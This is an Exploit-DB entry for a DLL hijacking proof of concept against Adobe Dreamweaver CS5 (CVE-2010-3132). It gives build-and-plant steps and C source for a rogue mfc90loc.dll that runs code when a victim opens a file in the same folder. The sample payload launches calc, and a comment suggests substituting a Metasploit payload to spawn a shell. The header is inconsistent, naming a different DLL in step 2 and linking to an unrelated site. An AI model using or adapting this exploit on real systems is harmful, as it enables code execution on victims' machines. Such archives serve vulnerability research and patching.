Adobe Dreamweaver CS5 <= 11.0 build 4909 - DLL Hijacking Exploit (mfc90loc.dll)



EDB-ID: 14740 CVE: 2010-3132 OSVDB-ID: 67493
Author: diwr Published: 2010-08-25 Verified: Not Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
# Exploit Title: Adobe Dreamweaver CS5 DLL Hijacking Exploit (mfc90loc.dll)
# Date: 25/08/2010
# Author: Bruno Filipe (diwr) http://digitalacropolis.us
# Software Link: http://www.adobe.com <http://www.bsplayer.org>
# Version: <= 11.0 build 4909
# Tested on: WinXP SP2, WinXP SP3
# Other Adobe CS5 products may be vulnerable too.
# Thx TheLeader ;)
#
----------------------------------------------------------------------------------------------------------
# This should work with any file handled by Dreamweaver (.php, .asp, etc)
# 1. gcc dllmain.c -o mfc90loc.dll
# 2. Put mfc90ptb.dll in the same directory of a file handled by Dw (EG:
anything.php)
# 3. You can generate a msfpayload DLL and spawn a shell, for example.
#
----------------------------------------------------------------------------------------------------------

#include <windows.h>

int main()
{
  WinExec("calc", SW_NORMAL);
  exit(0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  main();
  return 0;
}